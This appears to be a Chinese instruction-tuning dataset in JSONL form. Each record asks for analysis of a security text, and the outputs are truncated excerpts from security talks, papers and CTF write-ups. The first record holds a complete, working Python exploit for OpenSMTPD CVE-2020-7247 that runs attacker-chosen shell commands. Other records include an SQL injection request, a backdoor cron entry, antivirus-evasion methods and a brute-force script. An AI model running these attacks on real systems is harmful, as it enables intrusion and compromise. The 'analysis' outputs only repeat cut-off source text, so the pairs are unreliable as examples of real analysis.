{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https://www.opensmtpd.org/ # Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11 (x64) # CVE: CVE-2020-7247 # References: # https://www.openwall.com/lists/oss-security/2020/01/28/3 # # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately # escape dangerous characters from user-controlled input. An attacker # can exploit this to execute arbitrary shell commands on the target. # #!/usr/local/bin/python3 from socket import * import sys if len(sys.argv) != 4: print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0])) print(\"E.g. {} 127.0.0.1 25 'touch /tmp/x'\".format(sys.argv[0])) sys.exit(1) ADDR = sys.argv[1] PORT = int(sys.argv[2]) CMD = sys.argv[3] s = socket(AF_INET, SOCK_STREAM) s.connect((ADDR, PORT)) res = s.recv(1024) if 'OpenSMTPD' not in str(res): print('[!] No OpenSMTPD detected') print('[!] Received {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] OpenSMTPD detected') s.send(b'HELO x\\r\\n') res = s.recv(1024) if '250' not in str(res): print('[!] Error connecting, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Connected, sending payload') s.send(bytes('MAIL FROM:<;{};>\\r\\n'.format(CMD), 'utf-8')) res = s.recv(1024) if '250' not in str(res): print('[!] Error sending payload, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Payload sent') s.send(b'RCPT TO:<root>\\r\\n') s.recv(1024) s.send(b'DATA\\r\\n') s.recv(1024) s.send(b'\\r\\nxxx\\r\\n.\\r\\n') s.recv(1024) s.send(b'QUIT\\r\\n') s.recv(1024) print('[*] Done')", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUSB Attacks: Fun with Plug and 0wn Defcon 17 Rafael Dominguez Vega 2nd August 2009 A little about me ... 2 rafael.dominguezvega[at]mwrinfosecurity[dot]com http://labs.mwrinfosecurity.com Main Objectives  Attacks & Impact  Bug Discovery  Driver Exploitation 3 What this talk will cover  USB for fun and profit  Fuzzing Techniques  Crash Debugging  Exploitation  Hardware Implementation  A few demos here and there.... 4 Once upon a time ... 5 USB Attacks  AutoRun (Conficker...)  Mislaid or Planted Devices  Driver Bugs 6 USB Attacks (cont.)  AutoRun Disabled  Encrypted USB Pen Drives  USB Bus Disabled 7 How Pwnies at home became Research...  There was a problem target (a client)  Hardware/Software Testing  New Feature  USB port implemented 8 USB Driver Testing  Black Box Testing  White Box Testing 9 And of course... Beer Based Testing! 10 USB Technical Background  USB Communication  Enumeration  Descriptors  Other protocols 11 Enumeration  Device Identification  Automatic  Descriptors Sent 12 Descriptors  Device Descriptor  Configuration Descriptor  Interface Descriptor  Endpoint Descriptor  String Descriptor 13 Device Descriptor 14 const USB_DEVICE_DESCRIPTOR DeviceDescriptor = { sizeof(USB_DEVICE_DESCRIPTOR), /* bLength */ TYPE_DEVICE_DESCRIPTOR, /* bDescriptorType */ 0x0110, /* bcdUSB USB Version 1.1 */ 0, /* bDeviceClass */ 0, /* bDeviceSubclass */ 0, /* bDeviceProtocol */ 8, /* bMaxPacketSize 8 Bytes */ 0xBEEF, /* idVendor */ 0x1337, /* idProduct */ 0x0000, /* bcdDevice */ 1, /* iManufacturer String Index */ 0, /* iProduct String Index */ 0, /* iSerialNumber String Index */ 1 /* bNumberConfigurations */ }; Refer. Microchip Technology Inc. Low Pin Count USB Development Kit Users Guide String Descriptor 15 //Manufacturer string descriptor ROM struct{BYTE bLength;BYTE bDscType;WORD string[12];} sd002={sizeof(sd002),USB_DESCRIPTOR_STRING, { 'M','A','N','U','F','A','C','T','U','R','E','R' }}; //Product string descriptor ROM struct{BYTE bLength;BYTE bDscType;WORD string[7]", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvading next-gen AV using A.I. Hyrum Anderson hyrum@endgame.com @drhyrum /in/hyrumanderson https://github.com/endgameinc/gym-malware Rules for static analysis x1 rule malware { strings: $reg = \\\\CurrentVersion\\\\Internet Settings condition: filesize < 203K and #reg > 3 } filesize count(-registry-prefix) Next-gen AV using machine learning f(\"size,\"#reg ) filesize count(-registry-prefix) Automated Sophisticated relationships Generalizes Can We Break Machine Learning?  Static machine learning model trained on millions of samples x1 Machine Learning Model score=0.95 (malicious, moderate confidence)  Simple structural changes that dont change behavior Machine(Learning( Model score=0.49 (benign, just barely)  upx_unpack  .text -> .foo (remains valid entry point)  create .text and populate with .text from calc.exe + modified elements of PE file Yes! For deep learning and images  Machine learning models have blind spots / hallucinate (modeling error)  Depending on model and level of access, they can be straightforward to exploit  Adversarial examples can generalize across models / model types (Goodfellow 2015)  blind spots in MY model may also be blind spots in YOUR model (scaled(for(visibility) image(credit:(http://www.popsci.com/byzantine-science-deceiving-artificial-intelligence What about for PE malware? + = image Bus (99%), Ostrich (1%) BUT + != modified bytes or features break PE format destroy function Malware (90%), Benign (10%) Attacker requires full knowledge of *deep learning* model Generated sample may not be valid PE file Related Work: PDF attack / report score Genetic algorithm Functional Broken Black Box AV (produces score) Oracle Requires score from black box model Oracle/sandbox [expensive] EvadeML [for PDF malware] (Xu, Qi, Evans, 2016) Summary of Previous Works Gradient-based attacks: perturbation or GAN  Attacker requires full knowledge of model structure and weights  Generated sample may not be valid PE file Genetic Algorithms  Attacker requires score fr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBugscan 基于插件众筹的分布式 漏洞扫描平台 契机 团队 功能 特点 契机 团队成员 BugScan和圈子成员 马坤(cnfjhh) 公司&团队负责人 12年信息安全领域专家 专注于网络安全前沿研 究 陈震国(Zero) BugScan扫描引擎研发 10年全栈工程师经验 玩转各种编程语言 著名的HijackGh0st Arpspoof作品的作者 赵培源(半块西瓜 皮) BugScan扫描框架研发 7年以上python功底 熟悉各种漏洞原理 漏洞圈子的作者 贾林杰(不流畅) BugScan插件审核 5年以上底层固件研发 经历 圈子插件审核员 武成军 BugScan开发 10年以上C++开发经验 团队成员 圈子社区核心成员 Medici.Yan 擅长各种系统服务的协议分析 range 擅长各种web程序的漏洞 Wyc0 能将各种热门漏洞收集分析迅速写成漏 洞插件 功能 服务的扫描 snmp rsync memcache smb socks5 nfs进行弱口令爆破和漏洞扫 描 功能 Web扫描 struts2 功能 扫描器常规功能 功能 我是功能 网络设备 特点 历时四年五次重构 01 02 05 03 04 Bugscan 基于插件众筹的分布式 漏洞扫描平台 01.跨平台 核心扫描引擎使用python编写 不受操作系统限制 创建节点无需下载第三方安装包 05.高速稳定 前端使用angularjs框架与rest技术 后端采用go语言开发 可承受更多的节点并发执行任务 02.分布式 一句命令即可创建节点 多节点自动负载均衡 03.云插件 节点无需操作 自动升级最新的插件 04.漏洞库 漏洞库实时更新 现已有2万余条漏洞记录 www.BugScan.net 特点 跨平台 分布式 特点 云插件 特点 漏洞库 特点 扫描报告 特点 圈子 产品介绍 时间轴 2月5 4月1 6月1 Bugscan正式上线 仅开放注册1周注册人数突破2000 之后为邀请码注册阶段 插件由发布时的90个增长到500多个注 册人数增加到8000个 圈子社区上线 Q.BugScan.net 业界第一个基于扫描框架和插件研究的圈子 目前已扫描超过100万的目标600万余条漏洞记录 https://www.bugscan.net/ THANKS FOR YOUR WATCHING", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnat smash 0x00 get wendell 0x01 nf_conntrack_ftp nf_conntrack_ftp ftp 1. ESTABLISHED 2. 3. TCP PAYLOAD 4. PORTEPRT 5. 6. 21 1. ESTABLISHED 2. tcp payload\\n 3. 4. 21 \\n helpfind_pattern seq\\nseqseq flagfind_pattern seqmsstcp payloadseq tcp seqseq1lenpayloadack nf_contrack_ftpseqlen(payload)seq1len payloadseq 0x03 post ftph323tcp tcp window tcp window windowwindowackseqftp window50. window tcpsyn ackwindow=50scapy TCP_SYNACK = TCP(window=50,sport=21, dport=ValueOfPort, flags=\"SA\", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)]) post 0x02 tls sessionid wendellideawhen tls hack you https://github.com/jmdx/TLS-poison/ get urlwindowftpurl httpstlssessionidget 1. httpstls sessionid 2. sessionidpayload 3. sessionid 4. 5. sessionidtls 6. sessionid 7. tcp windowsessionid 0x03 tlsdemo 1. scapytcpack 2. https://github.com/tlsfuzzer/tlslite-ng wendellpytls pydemo https 1. tlslite-nghttps 2. tlslite-ngpayloadsessionid tlslite/tlsconnection.py httpshttpspayload 302scapy windowsyn+ackackpayload 0a payload clienthelloclient hello windowtcppayload tls 0x04 ftpftp nat slipstream nat slipstreamnat smash", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n中国网安集团广州三零卫士 伍智波SkyMine ①Linux主要日志类型的分析 ②Windows主要日志类型的分析 ③某次真实入侵事件的日志分析过程 ④入侵案例攻击链分析 ①Linux主要日志类型的分析 accesslog accesslog是web中间件最 为重要的日志文件之一它 记录了访问web应用的所有 请求其中记录的字段主要 包括来源IP请求时间请 求方法请求路径HTTP状 态码请求包大小等是识 别web攻击的重要指标 192.168.97.1 - - [02/Mar/2018:02:24:16 +0800] \"GET /guestbook.php HTTP/1.1\" 200 831 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\" 192.168.97.1 - - [02/Mar/2018:02:54:28 +0800] \"GET /manage/login.php?gotopage=%20UNION%20AL L%20SELECT%20NULL%2CNULL%2CNULL- -%20AFdY HTTP/1.1\" 200 1689 \"-\" \"sqlmap/1.2.4#stable (http://sqlmap.org)\" ①Linux主要日志类型的分析 /var/log/secure /var/log/secure是linux的 重要日志之一它记录了安 全信息和系统登录的相关信 息包括ssh登录sftp等 通过这个日志文件可以审 计ssh爆破22端口非法文件 操作等安全事件 Mar 2 06:10:02 ubuntu sshd[4886]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.97.1 user=test Mar 2 06:10:02 ubuntu sshd[4860]: pam_unix(sshd:session): session opened for user test by (uid=0) ①Linux主要日志类型的分析 /var/log/secure /var/log/secure是linux的 重要日志之一它记录了安 全信息和系统登录的相关信 息包括ssh登录sftp等 通过这个日志文件可以审 计ssh爆破22端口非法文件 操作等安全事件 Mar 2 06:15:14 ubuntu sftp-server[5181]: session opened for local user test from [192.168.97.1] Mar 2 06:24:08 ubuntu sftp-server[5181]: open \"/tmp/test.php\" flags WRITE,CREATE,TRUNCATE mode 0644 Mar 2 06:24:08 ubuntu sftp-server[5181]: close \"/tmp/test.php\" bytes read 0 written 1486 ①Linux主要日志类型的分析 /var/log/cron /var/log/cron是linux的系 统日志之一它记录了系统 所有的计划任务执行记录 在这个日志里往往可以找到 黑客后渗透阶段设置的一 些持久性后门 Mar 2 08:52:01 ubuntu cron[1115]: (*system*) RELOAD (/etc/crontab) Mar 2 08:53:01 ubuntu CRON[7469]: (root) CMD (/opt/shell.elf &) ②Windows主要日志类型的分析 安全日志 Windows服务器分 析安全事件安全日志 是最重要的数据之一 利用这个日志我们可 以获悉3389账号爆破等 常见的攻击类型 ③某单位遭遇黑客入侵后的日志分析过程 某单位在2018年3月2日上午8点50分左右被上级单位通报发现其单位的门 户网站服务器正在不断对外连接浙江省IP地址110.75.192.33的TCP 8888端口 我单位应急响应小组于当天上午9点40分到达现场处置该事件 本案例中的地域IP端口时间URL等敏感信息均已虚假化 所有截图均是在实验环境中复现 ③某单位遭遇黑客入侵后的日志分析过程 应急响应小组到场后迅速通过netstat anltp | grep 110.75.192.33:8888尝试 定位对外连接的进程找到了这个进程随后通过ps aux | grep shell.elf找到了 进程的路径记录了shell.elf的创建时", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGhost in the Wireless, iwlwifi edition Nicolas Iooss and Gabriel Campana nicolas.iooss@ledger.fr gabriel.campana@ledger.fr Ledger Donjon Abstract. Wi-Fi replaced Ethernet and became the main network pro- tocol on laptops for the last few years. Software implementations of the Wi-Fi protocol naturally became the targets of attackers, and vulnera- bilities found in Wi-Fi drivers were exploited to gain control of the OS, remotely and without any user interaction. However, not much research has been published on Wi-Fi firmware, outside of Broadcom models. This article presents the internals of an Intel Wi-Fi chip. This study, mostly conducted through reverse engineering, led to the discovery of vulnerabilities such as arbitrary code execution on the chip and secure boot bypass, which were reported to the manufacturer. 1 Introduction 1.1 How we met the Intel Wi-Fi chip One day in January 2021, Gabriel tried to browse a web application hosted by his laptop using his smartphone. This operation seems simple, but that day, it made his laptop disconnect from the Wi-Fi network, and this was reproducible. As this was quite annoying, he opened his kernel log (listing 1). 1 iwlwifi 0000:01:00.0: Start IWL Error Log Dump: 2 iwlwifi 0000:01:00.0: Status: 0x00000100 , count: 6 3 iwlwifi 0000:01:00.0: Loaded firmware version : 34.0.1 4 iwlwifi 0000:01:00.0: 0 x00000038 | BAD_COMMAND 5 ... 6 iwlwifi 0000:01:00.0: Start IWL Error Log Dump: 7 iwlwifi 0000:01:00.0: Status: 0x00000100 , count: 7 8 iwlwifi 0000:01:00.0: 0 x00000070 | ADVANCED_SYSASSERT 9 ... 10 iwlwifi 0000:01:00.0: 0 x004F01A7 | last host cmd 11 ieee80211 phy0: Hardware restart was requested Listing 1. Messages appearing in Linux kernel log while requesting a web page The failed assertion (line 8) indicated an issue in the firmware of the Wi-Fi chip. This issue was easy to reproduce and only occurred when both 2 Ghost in the Wireless, iwlwifi edition the smartphone and the laptop were connected to the same Wi-Fi access point.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRob Rehrig Josh Marks Larry Aiello Introduction to the Wiimote  Nintendos controller for the Wii system  Infrared camera in the front  Determines direction Wiimote is moving  How far the Wiimote is from the Sensor Bar  Sensor Bar is just 2 clusters of IR LEDs  Wiimote cluster coordinates to determine positioning  Track up to 4 IR sources Why We Chose the Wii Platform  Wiimotes are inexpensive ($40)  Great infrared tracking capabilities  Up to 4 sources  Bluetooth capabilities  Easy to relay information to computer  Existing libraries that access wiimote data  wiiuse.net Our Plan  Provide more interface options for people with disabilities  Infrared Tracking  Head to mouse tracking  Gesture recognition  Weight shift tracking  Mouse simulation Help the Disabled  Head tracking to provide alternate mouse control  Gesture recognition to reduce interface complexity  Wii Balance Board for added mouse control Infrared Tracking  Head Tracking  Attach an infrared source to the head  Enables head movement to mouse positioning  Wiimote tracks IR positioning on head  Relays the coordinates to create mouse positioning  3 Dimensional positioning  X and Y coordinates for mouse movement  Z coordinate to determine distance from the screen Wii Balance Board Tracking  16 bit Pressure sensors in the feet  1 on each corner (4 total)  Calibrate initial pressure  Returns pressure displacements Long Term Goals/Possibilities  Sign language recognition  More user interface capabilities and controls  A simpler design (less wires and power used) Wii love you all! Thank You For Coming!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Parser Logic! Take Your Path Normalization Off and Pop 0days Out Orange Tsai Orange Tsai  Security researcher at DEVCORE  Hacks in Taiwan member orange_8361 Agenda 1. Introduce the difficulty 2. In-depthly review existing implementations 3. New multi-layered architecture attack surface Normalize To make standard; determine the value by comparison to an item of known standard value Why normalization? To protect something Inconsistency if (check(path)) { use(path) } Why path normalization  Most web handle files(and apply lots of security mechanism)  Lack of overall security review  Code change too fast, does the patch and protection still work?  The 3 years Mojarra story - from CVE-2013-3827 to CVE-2018-1234 How parsers could be failed? Can you spot the vulnerability? static String QUOTED_FILE_SEPARATOR = Pattern.quote(File.separator) static String DIRECTIVE_FILE_SEPARATOR = '/' public AssetFile getAsset(String relativePath) { if(!relativePath) return null relativePath = relativePath.replace( QUOTED_FILE_SEPARATOR, DIRECTIVE_FILE_SEPARATOR) replace v.s. replaceAll String replace(String target, String replacement) String replaceAll(String regex, String replacement) Can you spot the vulnerability? static String QUOTED_FILE_SEPARATOR = Pattern.quote(File.separator) static String DIRECTIVE_FILE_SEPARATOR = '/' public AssetFile getAsset(String relativePath) { if(!relativePath) return null relativePath = relativePath.replace( QUOTED_FILE_SEPARATOR, DIRECTIVE_FILE_SEPARATOR) Pattern.quote(\"/\") = \"\\Q/\\E\" ..\\Q/\\E is the new ../ in Grails /app/static/ v.s. /app/static How single slash could be failed? Nginx off-by-slash fail  First shown in 2016 December HCTF - credit to @iaklis  A good attack vector but very few people know  Nginx says this is not their problem  Nginx alias directive  Defines a replacement for the specified location Nginx off-by-slash fail http://127.0.0.1/static/../settings.py Nginx normalizes /static/../settings.py to /settings.py does not match the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n下一代移动应用安全 江苏通付盾信息安全技术有限公司 移动应用发展 5 G 时 代 的 到 来  G D P R 对 国 内 关 于 在 移 劢 应 用 数 据 方 面 未 来 的 影 响  攻防不对等导致黑客屡屡得手 攻击被发现的平均时间 229天 企业自行发现的比例 33% 小时 月 天/ 周 问题不再是是否被黑 而是什么时候被黑和你什么时候发现被黑 实施攻击 入侵得手 发现 补救 防护对象与防护边界的变化 外网 互联网 内网 业务 专网 数据传输 从专业安全转向互联网+安全 从内向外 从边界安全转向IT生态安全 从一向多 业务驱动安全 互联网+ 现今移动安全架构 移动终端 安全边界 核心业务区 业务系统 大数据 安全审计 虚拟化 安全防护 访 问 控 制 安全管理 入侵检测 监控预警 漏洞检测 准入控制 安全加密 身份认证 病 毒 检 测 访 问 控 制 流 量 清 洗 通信 4G/5G 终端应用 实名认证 APP加固 不存储业务数据等 通信 应用协议传输加密通道 抗DDoS攻击 蜜罐诱导攻击 APT攻击检测等 后台服务 业务系统 大数据 云平台 安全管控 安全审计 监控预警 入 侵 防 御 防御能力与业务发展不匹配 合规 要求 安全 滞后 管理 困难 平台 混杂 边界 不清 移劢办公 移劢作业 移劢业务 规划阶段 建设阶段 运行阶段 从静态防御到动态防御的趋势 发现 响应 取证 溯源 研判 拓展 智慧 协同 情报驱动 大数据安全分析 部署维护困难 数据标准不统一 计算能力弱 从S-SDLC和DevSecOps相结合 移动应用开发安全全生命周期  安全功能的服务化自动化工具  响应的时间可控制在一个很短的时间内  减少产品研发过程中的安全投入增强安全效果 核心安全培 训 培训 确定安全要 求 创建质量门 /Bug栏 安全和隐私 风险评估 要求 确定设计要 求 分析攻击面 威胁建模 设计 使用批准工 具 弃用不安全 函数 静态分析 实施 劢态分析 模糊测试 攻击面评析 验证 事件响应计 划 最终安全评 估 发布存档 发布 执行事件响 应计划 响应 下一代移动应用安全  侦测事件  确认与优先级  事故隔离  补救与改进  设计与改进模型  调查与取证  加固与隔离系统  转移攻击  攻击事件防护  主劢发现分析  预测攻击  基线系统 预测 防御 检测 响应 立体化拟态防御体系 发起 1 攻击 发现 2 攻击 拦截 3 攻击 威胁 4 感知 精准 溯源 5 移动应用安全 防护 大数据学习和 分析 联动防御 移 动 应 用 全 业 务 流 程 下一代移动应用安全示意图 数据中心 OA BI ERP CRM BBS 邮件 营销 物流 IM FTP 采购  Intranet 黑客 APT攻击者 僵尸网络 内部恶意员工 内部正常员工 内部恶意员工 Internet 移动应用安全威胁感知 安全数据采集 安全数据采集 硬件信息采集 设备指纹硬件 信息系统信息 应用信息归属 地网络类型 行为信息等 环境信息采集 root/越狱是否 使用修改器框架 是否模拟器是 否存在病毒木马 威胁建模 安全数据采集 针对已知威胁建模 自定义规则建模 利用大数据技术和 人工智能技术进行 自学习建模 威胁情报 安全数据采集 全面分析设备 系统移动应用 等基本信息及程 序运行运行环 境攻击行为等 威胁信息对攻 击时间攻击来 源攻击目标 攻击手段等进行 全面的统计分析 生成威胁情报 安全策略及展示 安全数据采集 对恶意攻击行为 的安全防御策略 配置 采用可视化技 术形成威胁情 报的态势图借 助态势可视化为 安全管理人员提 供辅助决策信 息 借鉴Gartner理念 安全检测技术需要升级换代 1. CASB 2. 终端检测与响应EDR 3. 基于非签名方法的终端防御技术 4. 用户和实体行为分析UEBA技术 5. 微隔离和流可视性 6. DevOps安全 7. 情报驱劢的安全运营中心 8.远程浏览器技术 9.伪装技术 10.普适信任服务 人工智能 机器学习 深度学习 行为分析 下一代移动应用技术优势  纠缠感知实现了终端与服务端无地域无边界实时态势感知  动态生成防护在收到威胁信号后智能判定结果自动生成防护方案  自适应防护面对不同的场景采用灵活的自适应安全防护方案 挑战移动应用安全+神经网络 手动挡 自动挡 自动驾驶 汽车的发展历史把人解放出来自适应环境降低操作的故障 自动驾驶汽车发展的挑战机器学习训练但依赖于可信的广覆盖的环境数据 手工命令行部署 图形化界面部署 人工智能+深度学习 自适应自学习 自优化 客服电话400-831-8116 商务合作info@tongfudun.com 官方网址www.tongfudun.com 售后服务service@tongfu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReturn to sender Detecting kernel exploits with eBPF Guillaume Fournier August 2022 About me  Cloud Workload Security (CWS)  Leverage eBPF to detect threats  Embedded in the Datadog Agent Blackhat 2022 Guillaume Fournier Senior Security Engineer @Datadog gui774ume.fournier@gmail.com 2  Context and threat model  Why eBPF ?  KRIe  SMEP & SMAP on a budget  Kernel security configuration  Kernel runtime alterations  Control flow integrity  Enforcement  Performance Agenda 3 Context and threat model  Critical CVEs are regularly discovered in the Linux Kernel  Security administrators worry about:  Keeping up with security updates  Deploying security patches  Monitoring & protecting vulnerable hosts Blackhat 2022 4 Context and threat model  Hundreds of ways to exploit the Linux kernel  This talk targets 3 types of vulnerabilities:  Execution flow redirections  Logic bugs  Post compromise kernel runtime alterations The goal is to detect (and prevent ?) these attacks with eBPF Blackhat 2022 5 Context and threat model  Hundreds of ways to exploit the Linux kernel  This talk targets 3 types of vulnerabilities:  Execution flow redirection  Logic bugs  Post compromise kernel runtime alteration The goal is to detect (and prevent ?) these attacks with eBPF Make attackers lives a living hell 6 Blackhat 2022 What is eBPF ?  Run sandboxed programs in the Linux kernel 7 Blackhat 2022 Why eBPF ?  Relatively wide kernel support (4.1 +) depending on eBPF features  System safety and stability insurances  Rich feature set with easy to use introspection capabilities  Some write access and enforcement capabilities 8 Blackhat 2022 Why eBPF ? Why is this a terrible idea ?  Detecting post compromission is fighting a lost battle  There are dozens of ways to disable an eBPF program  eBPF can have a significant in kernel performance impact So whats the point ?  Script kiddies and OOTB rootkits  Make it harder to exploit a flaw  Detecting & blocking pre-compromission is sometimes possible 9 Blackhat 2022  O", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2011 NATO Cooperative Cyber Defence Centre of Excellence, June 2011 All rights reserved. No part of this pub- lication may be reprinted, reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without the prior written permission of the NATO Cooperative Cyber Defence Centre of Excellence. Publisher: CCD COE Publication Filtri tee 12, 10132 Tallinn, Estonia Tel: +372 717 6800 Fax: +372 717 6308 E-mail: ccdcoe@ccdcoe.org www.ccdcoe.org Print: OÜ Greif Trükikoda Design & Layout: Marko Söönurm Legal notice NATO Cooperative Cyber Defence Centre of Excellence assumes no responsibility for any loss or harm arising from the use of information contained in this book. ISBN 978-9949-9040-5-1 (print) ISBN 978-9949-9040-6-8 (epub) ISBN 978-9949-9040-7-5 (pdf) KENNETH GEERS STRATEGIC CYBER SECURITY NATO Cooperative Cyber Defence Centre of Excellence Abstract This book argues that computer security has evolved from a technical discipline to a strategic concept. The worlds growing dependence on a powerful but vulnerable Internet  combined with the disruptive capabilities of cyber attackers  now threat- ens national and international security. Strategic challenges require strategic solutions. The author examines four nation- state approaches to cyber attack mitigation.  Internet Protocol version 6 (IPv6)  Sun Tzus Art of War  Cyber attack deterrence  Cyber arms control The four threat mitigation strategies fall into several categories. IPv6 is a technical solution. Art of War is military. The third and fourth strategies are hybrid: deter- rence is a mix of military and political considerations; arms control is a political/ technical approach. The Decision Making Trial and Evaluation Laboratory (DEMATEL) is used to place the key research concepts into an influence matrix. DEMATEL analysis demon- strates that IPv6 is currently the most likely of the four examined strategies to improve a nations", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Singapore - Harbour Category: Web ## Description > Boy this has been a tough journey, you had luck that you entered a box that contained some food. You hear foul voices and feel that some people pick up your box, and carry it to another place. When the voices disappear, you take the chance to escape. You have successfully arrived in Singapore. You find a peaceful café, order a cup of tea and charge your cell phone. PLING, youve received another text message from the boss: \"I pretend that I dont know where you are, but I do. Youll have to forgive me, but Ive had a tracker on you all the time. You have finally reached Singapore, find \"M/S. Revenger\" and sneak onboard, it will take you to our enemy's hidden island, make it quick, the ship is leaving the harbor soon, I count on you AGENT!.\" Look, overthere \"M/S Revenger\", you have to get closer! Hmm, but it seems quite guarded. You will have to swim! You go away from the ship and dive into the warm and clear water. Its nice to go for a swim but you would have preferred it to be under more relaxed circumstances. You swim slowly towards the ship, finally you reach it, climb up on the side of it and in through a window. You find yourself in a cabin with locked doors. Thankfully, it's an electronic lock. > > Challenge: Old lock (web) > > You're not sure what metal the keypad was made of, but either it was very soft, or whoever punches in the code has waay too much strength in their fingers. This also means you're in luck, since it's pretty obvious which digits are actually used in the 5-digit code. The order is unknown, but there can't be that many possibilities, right? Note: Online brute forcing is allowed in this task. ## Solution The attached website displays the following: ![](images/keypad.png) We'll just try all possibilities: ```python from pwn import * import requests import itertools keys = [3, 5, 7, 8, 0] with log.progress(\"Brute-forcing combination\") as p: for permutation in itertools.permutations(keys): passco", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBinary 自動分析的那些事 YSc 2016/07/22 2  當你拿到一個 binary ... 3  當你拿到一個 binary ...  file binary  ltrace  gdb  IDA  ... 4  當你拿到一個 binary ...  file binary  ltrace  gdb  IDA  ... 5  當你拿到一個 binary ...  file binary  ltrace  gdb  IDA  ... 6  一條一條看一條一條算  用工具 z3 來算  整支程式自動跑自動算 7 這個議程在幹麻  binary 自動分析的原理  如何用 angr 寫解 CTF reverse 的腳本  先來談談要怎麼自動分析  符號執行 symbolic execution   用 angr 來自動分析 binary  以及遇到的問題要怎麼解決  符號執行的優化  經驗談更多 angr 用法 8 先講個分類  靜態分析  IDA  動態分析 - GDB 9 先講個分類  靜態分析  IDA  優點  程式覆蓋  找到很多條程式執行路徑  缺點  該從那開始分析  怎麼互動  動態分析 - GDB 10 先講個分類  靜態分析  IDA  動態分析  GDB  優點  可以觀察到記憶體暫存器 的值  精確的結果  缺點  程式覆蓋有限  該怎麼模擬環境 11 先講個分類  靜態分析  IDA  動態分析  GDB  優點  可以觀察到記憶體暫存器 的值  精確的結果  缺點  程式覆蓋有限  該怎麼模擬環境  如何自動動態分析自動找 bug  12 Automated Discovery  Fuzzing  隨機放一堆 input 想辦法讓程式壞掉  Symbolic Execution  用符號變數來當作 input 而非實際的數值 13 Symbolic Execution 14 Symbolic Execution 15 Symbolic Execution  Dynamic analysis  Set symbolic values and constraints  Concretize to obtain a possible value Constraints X >= 5 X < 50 Concretize X = 20 16 Symbolic Execution x = get_intput(); if (x >= 5) if (x < 50) bug(); else printf(\"??\"); else printf(\"yo\"); State A --- --- Target 17 Symbolic Execution x = get_intput(); if (x >= 5) if (x < 50) bug(); else printf(\"??\"); else printf(\"yo\"); State AA X = ??? X >= 5 State AB X = ??? X < 5 State A X = ??? --- 18 Symbolic Execution x = get_intput(); if (x >= 5) if (x < 50) bug(); else printf(\"??\"); else printf(\"yo\"); State AA X = ??? X >= 5 19 Symbolic Execution x = get_intput(); if (x >= 5) if (x < 50) bug(); else printf(\"??\"); else printf(\"yo\"); State AAA X = ??? X >= 5 X < 50 State AAB X = ??? X >= 5 X >= 50 State AA X = ??? X >= 5 20 Symbolic Execution x = get_intput(); if (x >= 5) if (x < 50) bug(); else printf(\"??\"); else printf(\"yo\"); State AAA X = 20 X >= 5 X < 50 21 Symbolic Execution  state 往下走一步就是往下走一個 basic block  在探索 path 時會不斷設置符號變數和收集限制式  使用 solvers 來解限制式  找出一組 input 使得滿足 path 上所有的限制式 22 Symbolic Execution  state 往下走一步就是往下走一個 basic block  在探索 path 時會不斷設置符號變數和收集限制式  使用 solvers 來解限制", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Lost key (crypto, 334p, 10 solved) Unfortunately we were unable to finish this task, but we managed to get the first part - recovery of `N`, and just for future reference we're include this part in a writeup. ## Overview In the task we get [source code](chall.py). We can connect to a service and we get back RSA encrypted flag. We can also send our own payload and get it encrypted as well. Our payload has restricted length and always includes prefix `X: `. ## General approach The general method for recovering `N` in such case, is to obtain some multiples of `N` and calcuate their GCD. If we had total control over the payload we could simply ask for encryption of `A` and of `A2` and calculate `(Ae mod N)2 - ((A2)e mod N)`. Such difference, by definition, has to be a multiple of `N`, because you can shift the exponentiation order and move modulo: ``` (Ae mod N)2 mod N = (Ae)2 mod N = (Ae mod N)2 mod N = (Ae)2 mod N = (A2)e mod N` ``` So if we apply `mod N` to `(Ae mod N)2` we should get the same value as in `((A2)e mod N)` therefore it has to be `((A2)e mod N) + k*N` and if we subtract 